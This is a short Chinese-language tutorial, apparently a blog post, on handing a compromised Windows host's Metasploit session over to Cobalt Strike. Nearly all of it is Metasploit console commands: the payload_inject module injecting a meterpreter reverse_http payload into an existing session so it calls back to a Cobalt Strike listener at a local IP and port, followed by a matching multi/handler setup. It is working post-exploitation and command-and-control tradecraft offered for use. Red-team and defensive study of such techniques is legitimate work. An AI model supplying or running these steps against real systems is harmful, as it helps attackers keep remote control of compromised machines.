MSF 派生 Cobalt Strike 会话

利用 Metasploit 派生 Cobalt Strike 会话

信息.

1
2
metasploit IP:192.168.1.100 PORT:4444
Cobalt Strike IP:192.168.1.101 PORT:5555

利用 payload_inject 模块注入新的 payload.

1
2
3
4
5
6
7
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lhost 192.168.1.101
set lport 5555
set session 1
set disablepayloadhandler true
run

在监听时将 LHOSTLPORT 改成 Cobalt Strike 对应的 IP 和 PORT.

1
2
3
4
5
6
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.1.101
set lport 5555
set disablepayloadhandler true 
run